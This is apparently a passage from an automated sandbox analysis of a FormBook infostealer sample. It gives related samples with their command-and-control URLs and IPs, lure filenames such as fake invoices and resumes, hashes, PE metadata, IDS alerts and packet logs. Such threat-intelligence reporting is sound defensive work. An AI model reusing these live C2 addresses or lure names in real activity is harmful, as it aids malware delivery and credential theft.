	Project review_Pdf.exe	Get hash	malicious	Browse	www.volemate.com/dll/?t81X=+rBDSeByYOuwiyCs2FmR2y2szzEgjgAAJgIvvmfJRMvBkX5MwbWWrzyN0ALTtAZKZ6lr&WPXhU=wBWHJtHHN
	Banking Details Review_Pdf.exe	Get hash	malicious	Browse	www.workonlinetimallen.com/dll/?FPWlH4K=22Ck7sZymRlue/F9el9iWIuDvjTWQNWCbFaq8o3IMCkjvmOJhGd/Odg920f9GQzD8gYG&Bl=sHdPVHypI2c
	kqwqyoFz1C.exe	Get hash	malicious	Browse	www.swavhca.com/jskg/?9roHn=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLDTuqn6wJ28t&npHhW=3fq4gDD0abs8
	RFQ 00068643 New Order Shipment to Jebel Ali Port UAE.exe	Get hash	malicious	Browse	www.alittlereward.com/x2ee/?8pGxKNk8=Vtb1/iiBU+uCF3AJeGCOPklMCv99vxzvnxKn5/cIaWE1JMwW91M+jgsTK6I+a0rF2zAW&DzudC=Bxo0src
	3Y690n1UsS.exe	Get hash	malicious	Browse	www.accessible.legal/csv8/?SR-D3jP=oGqbtMom9WGYi+RBhVD/q4yy78sx6VM5qFnCf+91Xqn8W7yN0ac+rgSlx+vzGuPbqxiE&J0GTk=3fPL-xo0rXp0UNn
	hlNvQKaRR3.exe	Get hash	malicious	Browse	www.pnorg.net/jskg/?yN6Ddr1H=FFllKUI2Vy3AcuNhWrh4fKbis3luBqLkf2wubdQ4CJ+GPQXPDvWWudAI4bM3GwbQsdH4&8p=2dOPB6nHz
	AT113020.exe	Get hash	malicious	Browse	www.thanksforlove.com/9t6k/?URflh=kTde6z/9FBgibCJh75hFV8EYWatL1OQ/rhfr5oU2UZBR6XWcBOIn723UV5Uezh3ZQ4ot&UfrDal=0nMpqJVP5t_PDD5p
	invoice No_SINI0068206497.exe	Get hash	malicious	Browse	www.wholesalebrands.xyz/mkr/
	PI210941.exe	Get hash	malicious	Browse	www.teamchi.club/t4vo/?o2J=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDQDM5ezuEyU2&4h0=vZR8DbS8Z4yXah
	NA_GRAPH.EXE	Get hash	malicious	Browse	www.teamchi.club/t4vo/?lN64=Npnlt5ZtO906n53msd9G5pBOdHOEeXQyD/1EjRFLMV7cbHJomhnAcg5WDQDmmuDuAwc2&8p=MTKP1hb
	HussCrypted.exe	Get hash	malicious	Browse	www.7dayscale.info/cia6/?JtxL=XPv4nNDh&DXFTE=xgSodjwNOpvqRBgSHkNiwEBg/WwFTBg6svwXL9igyoS1pHT72fkq2llttMIrDbkzmKwF7fpjCw==
	M11sVPvWUT.exe	Get hash	malicious	Browse	www.kurdishrealestateagents.com/ggb4/?p6A=VzUgzpiQkn30N256PBkiej7gQ1Kho/1eBKyywWWjmt2Ui9xM46LvrOITGrNcM7OxpBGx&oN9D=p4sXLLIPy2U4-N70
	#Uacac#Uc801 #Ud488#Ubaa9 #Ub9ac#Uc2a4#Ud2b8.exe	Get hash	malicious	Browse	www.grandsonretail.com/5bs/?r0=AmztrAFPeyVzzS+3x4KThX9CMtZ1P8IrwIWrZYptpQCuj7ZPVnXcrmo/iPf97oeMmrlf&sZLdvf=8pQt_4k
	AAPUR2-M.exe	Get hash	malicious	Browse	www.passiontip.com/g456/?8pt0_NFP=PuON5O03Ksi8fY7rErP/3xSQ1dHRQax2yunXZCWMmHTE5PPAC5+YkNyA1Bevc9/c9Z1b&RZ=X2JpoVIXxdlT_B0
	over.exe	Get hash	malicious	Browse	www.exeteraesthetics.com/72w/
	William Smith CV.doc	Get hash	malicious	Browse	www.fvqlkgedqjiqgapudkgq.com/post.php
	Michael Smith Resume.xls	Get hash	malicious	Browse	www.march262020.site/post.php
	William Smith Resume.xls	Get hash	malicious	Browse	www.march262020.site/post.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	winlog(1).exe	Get hash	malicious	Browse	198.54.117.216
	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	198.54.117.215
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	198.54.117.212
	IMG_1107.EXE	Get hash	malicious	Browse	198.54.117.212
	LOI.exe	Get hash	malicious	Browse	198.54.117.211
	PO_610.20-21.A2424.UP_PDF.exe	Get hash	malicious	Browse	198.54.117.217
	insz.exe	Get hash	malicious	Browse	198.54.117.218
	Invoice Payment Details.exe	Get hash	malicious	Browse	198.54.117.218
	Purchase order nr.0119-21.exe	Get hash	malicious	Browse	198.54.117.211
	Request for Quotation.exe	Get hash	malicious	Browse	198.54.117.216
	Bank details.exe	Get hash	malicious	Browse	198.54.117.212
	yxYmHtT7uT.exe	Get hash	malicious	Browse	198.54.117.215
	ins.exe	Get hash	malicious	Browse	198.54.117.210
	SHEXD2101127S_ShippingDocument_DkD.xlsx	Get hash	malicious	Browse	198.54.117.211
	PI_JAN9071011998_BARYSLpdf.exe	Get hash	malicious	Browse	198.54.117.217
	15012021.exe	Get hash	malicious	Browse	198.54.117.215
	Inv.exe	Get hash	malicious	Browse	198.54.117.217
	in.exe	Get hash	malicious	Browse	198.54.117.212
	urgent specification request.exe	Get hash	malicious	Browse	198.54.117.210
	g2fUeYQ7Rh.exe	Get hash	malicious	Browse	198.54.117.210
www.getyoursofa.com	po071.exe	Get hash	malicious	Browse	162.241.30.16

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	199.192.21.36
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	199.192.21.36
	winlog(1).exe	Get hash	malicious	Browse	198.54.117.216
	Revise Bank Details_pdf.exe	Get hash	malicious	Browse	198.54.116.236
	SecuriteInfo.com.BehavesLike.Win32.Generic.tz.exe	Get hash	malicious	Browse	198.187.31.7
	SecuriteInfo.com.Trojan.DownLoader36.37393.29158.exe	Get hash	malicious	Browse	198.187.31.7
	Payment Swift Copy_USD 206,832,000.00.pdf.exe	Get hash	malicious	Browse	198.54.116.236
	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	198.54.117.244
	DSksIiT85D.exe	Get hash	malicious	Browse	199.188.200.97
	file.exe	Get hash	malicious	Browse	198.54.116.236
	Tebling_Resortsac_FILE-HP38XM.htm	Get hash	malicious	Browse	104.219.248.112
	file.exe	Get hash	malicious	Browse	198.54.116.236
	RevisedPO.24488_pdf.exe	Get hash	malicious	Browse	198.54.117.215
	74725794.exe	Get hash	malicious	Browse	198.54.122.60
	SAMSUNG C&T UPCOMING PROJECTS19-027-MP-010203.exe.exe	Get hash	malicious	Browse	198.54.117.212
	ACH Funds Transferred.xls	Get hash	malicious	Browse	199.188.200.124
	ACH Funds Transferred.xls	Get hash	malicious	Browse	199.188.200.124
	BENVAV31BU.html	Get hash	malicious	Browse	63.250.38.8
	roK1cuvuLG.exe	Get hash	malicious	Browse	199.188.206.63
	DHL Details.exe	Get hash	malicious	Browse	198.54.126.165
DIGITALOCEAN-ASNUS	xDKOaCQQTQ.dll	Get hash	malicious	Browse	159.89.91.92
	4bEUfowOcg.dll	Get hash	malicious	Browse	159.89.91.92
	DAT.doc	Get hash	malicious	Browse	167.71.148.58
	ARCH_98_24301.doc	Get hash	malicious	Browse	138.68.42.38
	Bestellung.doc	Get hash	malicious	Browse	157.245.145.87
	RF-E93-STD-068 SUPPLIES.xlsx	Get hash	malicious	Browse	178.62.115.183
	vA0mtZ7JzJ.exe	Get hash	malicious	Browse	107.170.138.56
	SecuriteInfo.com.Generic.mg.b70d9bf0d6567964.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis5EFC4C46397A.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.75b2def6a7e110ad.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.32d178838c0fd41b.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis8353855AD729.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.b817172e5515b1af.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.ArtemisAA8578417627.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis58690C2E2BCA.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.ArtemisTrojan.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.0551f32bbe68c20b.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Artemis961F6F63FB8F.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.11330b175b08895e.dll	Get hash	malicious	Browse	159.89.91.92
	SecuriteInfo.com.Generic.mg.284f325559f6aab1.dll	Get hash	malicious	Browse	159.89.91.92
GOOGLEUS	xl2Ml2iNJe.exe	Get hash	malicious	Browse	34.102.136.180
	eEXZHxdxFE.exe	Get hash	malicious	Browse	35.228.108.144
	v07PSzmSp9.exe	Get hash	malicious	Browse	34.102.136.180
	o3Z5sgjhEM.exe	Get hash	malicious	Browse	35.186.223.98
	ltf94qhZ37.exe	Get hash	malicious	Browse	35.228.108.144
	NEW ORDER.xlsx	Get hash	malicious	Browse	34.102.136.180
	Inquiry_73834168_.xlsx	Get hash	malicious	Browse	34.102.136.180
	winlog(1).exe	Get hash	malicious	Browse	34.102.136.180
	win32.exe	Get hash	malicious	Browse	34.102.136.180
	DAT.doc	Get hash	malicious	Browse	35.200.206.198
	Bestellung.doc	Get hash	malicious	Browse	172.217.6.174
	.01.2021a.js	Get hash	malicious	Browse	35.228.108.144
	QT21006189.exe	Get hash	malicious	Browse	108.177.119.109
	1-26.exe	Get hash	malicious	Browse	34.102.136.180
	Request.xlsx	Get hash	malicious	Browse	34.102.136.180
	INV_TMB_210567Y00.xlsx	Get hash	malicious	Browse	34.102.136.180
	RFQ.xlsx	Get hash	malicious	Browse	34.102.136.180
	New Year Inquiry List.xlsx	Get hash	malicious	Browse	34.102.136.180
	RF-E93-STD-068 SUPPLIES.xlsx	Get hash	malicious	Browse	34.102.136.180
	gPGTcEMoM1.exe	Get hash	malicious	Browse	34.102.136.180

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Generator.cont.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	560911_P.EXE	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	IMG_61779.pdf.exe	Get hash	malicious	Browse
	IMG_5391.EXE	Get hash	malicious	Browse
	czZ769nM6r.exe	Get hash	malicious	Browse
	IMG_1107.EXE	Get hash	malicious	Browse
	r3q6Bv8naR.exe	Get hash	malicious	Browse
	sy1RnlHl8Y.exe	Get hash	malicious	Browse
	qyMlTIBawC.exe	Get hash	malicious	Browse
	Qn2AQrgfqJ.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.509.28611.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.509.17348.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.PackedNET.509.7497.exe	Get hash	malicious	Browse
	IMG_12283.exe	Get hash	malicious	Browse
	IMG_06176.pdf.exe	Get hash	malicious	Browse
	IMG_50617.pdf.exe	Get hash	malicious	Browse
	IMG_06177.pdf.exe	Get hash	malicious	Browse
	Order_List_PO# 081929.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\bXFjrxjRlb.exe.log Download File
Process:	C:\Users\user\Desktop\bXFjrxjRlb.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1873
Entropy (8bit):	5.355036985457214
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIW7HKjovitHoxHhAHKzvr1qHj:iqXeqm00YqhQnouRqjoKtIxHeqzTwD
MD5:	CDA95282F22F47DA2FDDC9E912B67FEF
SHA1:	67A40582A092B5DF40C3EB61A361A2D336FC69E0
SHA-256:	179E50F31095D0CFA13DCBB9CED6DEE424DFE8CEF8E05BDE1F840273F45E5F49
SHA-512:	1D151D92AE982D2149C2255826C2FFB89A475A1EB9B9FE93DC3706F3016CD6B309743B36A4D7F6D68F48CE25391FDA7A2BAE42061535EEA7862460424A3A2036
Malicious:	true
Reputation:	low
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Download File
Process:	C:\Users\user\Desktop\bXFjrxjRlb.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	42080
Entropy (8bit):	6.2125074198825105
Encrypted:	false
SSDEEP:	384:gc3JOvwWj8Gpw0A67dOpRIMKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+QsPZw:g4JU8g17dl6Iq88MoBd7mFViqM5sL2
MD5:	F2A47587431C466535F3C3D3427724BE
SHA1:	90DF719241CE04828F0DD4D31D683F84790515FF
SHA-256:	23F4A2CCDCE499C524CF43793FDA8E773D809514B5471C02FA5E68F0CDA7A10B
SHA-512:	E9D0819478DDDA47763C7F5F617CD258D0FACBBBFFE0C7A965EDE9D0D884A6D7BB445820A3FD498B243BBD8BECBA146687B61421745E32B86272232C6F9E90D8
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Generator.cont.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 560911_P.EXE, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: IMG_61779.pdf.exe, Detection: malicious, Browse Filename: IMG_5391.EXE, Detection: malicious, Browse Filename: czZ769nM6r.exe, Detection: malicious, Browse Filename: IMG_1107.EXE, Detection: malicious, Browse Filename: r3q6Bv8naR.exe, Detection: malicious, Browse Filename: sy1RnlHl8Y.exe, Detection: malicious, Browse Filename: qyMlTIBawC.exe, Detection: malicious, Browse Filename: Qn2AQrgfqJ.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.509.28611.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.509.17348.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.PackedNET.509.7497.exe, Detection: malicious, Browse Filename: IMG_12283.exe, Detection: malicious, Browse Filename: IMG_06176.pdf.exe, Detection: malicious, Browse Filename: IMG_50617.pdf.exe, Detection: malicious, Browse Filename: IMG_06177.pdf.exe, Detection: malicious, Browse Filename: Order_List_PO# 081929.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..X...........w... ........@.. ...................................`.................................Hw..O....... ............f..`>...........v............................................... ............... ..H............text....W... ...X.................. ..`.rsrc... ............Z..............@..@.reloc...............d..............@..B................\|w......H........#...Q...................u.......................................0..K........-....i.......r...p.o....,....r...p.o....-.......o......o.....$........o....(....(......:...(....o......r...p.o.......4........o......... ........o......s ........o!...s".....s#.......r]..prg..po$.....r...p.o$.....r...pr...po$.........s.........(%.....tB...r...p(&...&..r...p.('...s(.......o)...&..o....(+...o,.....&...(-...........3..@......R...s.....s....(....:.(/.....}P...J.{P....o0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.620907239788479
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	bXFjrxjRlb.exe
File size:	772608
MD5:	4a595c5540f0a097a5f11159cdf5c015
SHA1:	9bd00bf1ffbdf53c841cd8d8b0a4244fdb7ba583
SHA256:	d6c54588834faae60153c6a2e7318a7e9f243b9dbfbd6e0fc44d45f4d55c9fcf
SHA512:	5d00dca3ca2b9cf7e381576ac61d9dcd9166529f4a77b9b196962b295ced4af5d372af8aa351da6aef9d3fdbd897f0e1273799601f6429e5069ce826ecdff1d2
SSDEEP:	12288:Axu4lHfNbxp4FiDROtGr4eYNriW4/zxPZVCq6r8FSl:Axu4H/4RtRe2+TVCq6r8FS
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..^.................~...J........... ........@.. ....................... ............`................................

File Icon


Icon Hash:	aaacae8e96a2c0e6

Static PE Info

General
Entrypoint:	0x4b9cfe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0x5E2E884B [Mon Jan 27 06:50:51 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb9ca4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x46fa	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc0000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb7d04	0xb7e00	False	0.557449226717	data	5.60682914242	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x46fa	0x4800	False	0.154405381944	data	2.48778714004	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc0000	0xc	0x200	False	0.041015625	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0xba130	0x4028	data
RT_GROUP_ICON	0xbe158	0x14	data
RT_VERSION	0xbe16c	0x3a4	data
RT_MANIFEST	0xbe510	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2005 4;@:9>CF>>5?A@<AE4D4
Assembly Version	1.0.0.0
InternalName	IMG_155710.exe
FileVersion	5.8.10.13
CompanyName	4;@:9>CF>>5?A@<AE4D4
Comments	A7E@4HA4?@7HB;B98GH
ProductName	56:53B29963AH9:F76>A
ProductVersion	5.8.10.13
FileDescription	56:53B29963AH9:F76>A
OriginalFilename	IMG_155710.exe

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/26/21-17:00:12.996209	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49750	34.102.136.180	192.168.2.6
01/26/21-17:00:54.182765	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.6	198.54.117.215
01/26/21-17:00:54.182765	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.6	198.54.117.215
01/26/21-17:00:54.182765	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49758	80	192.168.2.6	198.54.117.215
01/26/21-17:01:57.688028	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49759	80	192.168.2.6	162.241.30.16
01/26/21-17:01:57.688028	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49759	80	192.168.2.6	162.241.30.16
01/26/21-17:01:57.688028	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49759	80	192.168.2.6	162.241.30.16

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 17:00:12.814466000 CET	49750	80	192.168.2.6	34.102.136.180
Jan 26, 2021 17:00:12.857068062 CET	80	49750	34.102.136.180	192.168.2.6
Jan 26, 2021 17:00:12.857337952 CET	49750	80	192.168.2.6	34.102.136.180
Jan 26, 2021 17:00:12.857362032 CET	49750	80	192.168.2.6	34.102.136.180
Jan 26, 2021 17:00:12.897577047 CET	80	49750	34.102.136.180	192.168.2.6
Jan 26, 2021 17:00:12.996208906 CET	80	49750	34.102.136.180	192.168.2.6
Jan 26, 2021 17:00:12.996234894 CET	80	49750	34.102.136.180	192.168.2.6
Jan 26, 2021 17:00:12.996419907 CET	49750	80	192.168.2.6	34.102.136.180
Jan 26, 2021 17:00:12.996989965 CET	49750	80	192.168.2.6	34.102.136.180
Jan 26, 2021 17:00:13.038964987 CET	80	49750	34.102.136.180	192.168.2.6
Jan 26, 2021 17:00:33.377145052 CET	49756	80	192.168.2.6	68.183.162.131
Jan 26, 2021 17:00:33.572619915 CET	80	49756	68.183.162.131	192.168.2.6
Jan 26, 2021 17:00:33.572856903 CET	49756	80	192.168.2.6	68.183.162.131
Jan 26, 2021 17:00:33.572993994 CET	49756	80	192.168.2.6	68.183.162.131
Jan 26, 2021 17:00:33.769326925 CET	80	49756	68.183.162.131	192.168.2.6
Jan 26, 2021 17:00:33.769351959 CET	80	49756	68.183.162.131	192.168.2.6
Jan 26, 2021 17:00:33.769365072 CET	80	49756	68.183.162.131	192.168.2.6
Jan 26, 2021 17:00:33.769821882 CET	49756	80	192.168.2.6	68.183.162.131
Jan 26, 2021 17:00:33.769942045 CET	49756	80	192.168.2.6	68.183.162.131
Jan 26, 2021 17:00:33.965962887 CET	80	49756	68.183.162.131	192.168.2.6
Jan 26, 2021 17:00:53.989685059 CET	49758	80	192.168.2.6	198.54.117.215
Jan 26, 2021 17:00:54.182435989 CET	80	49758	198.54.117.215	192.168.2.6
Jan 26, 2021 17:00:54.182614088 CET	49758	80	192.168.2.6	198.54.117.215
Jan 26, 2021 17:00:54.182765007 CET	49758	80	192.168.2.6	198.54.117.215
Jan 26, 2021 17:00:54.375332117 CET	80	49758	198.54.117.215	192.168.2.6
Jan 26, 2021 17:00:54.375354052 CET	80	49758	198.54.117.215	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 26, 2021 16:58:59.737405062 CET	56023	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:58:59.793910027 CET	53	56023	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:01.634555101 CET	58384	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:01.682532072 CET	53	58384	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:03.126521111 CET	60261	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:03.174284935 CET	53	60261	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:04.347095966 CET	56061	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:04.395015955 CET	53	56061	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:06.558878899 CET	58336	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:06.609677076 CET	53	58336	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:06.882843018 CET	53781	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:06.939060926 CET	53	53781	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:07.675842047 CET	54064	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:07.726490021 CET	53	54064	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:09.141752958 CET	52811	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:09.192516088 CET	53	52811	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:10.480093956 CET	55299	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:10.528147936 CET	53	55299	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:12.182248116 CET	63745	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:12.232950926 CET	53	63745	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:22.726092100 CET	50055	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:22.774058104 CET	53	50055	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:23.954519033 CET	61374	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:24.005290985 CET	53	61374	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:24.974210978 CET	50339	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:25.022103071 CET	53	50339	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:28.057495117 CET	63307	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:28.105453014 CET	53	63307	8.8.8.8	192.168.2.6
Jan 26, 2021 16:59:32.877170086 CET	49694	53	192.168.2.6	8.8.8.8
Jan 26, 2021 16:59:32.937530994 CET	53	49694	8.8.8.8	192.168.2.6
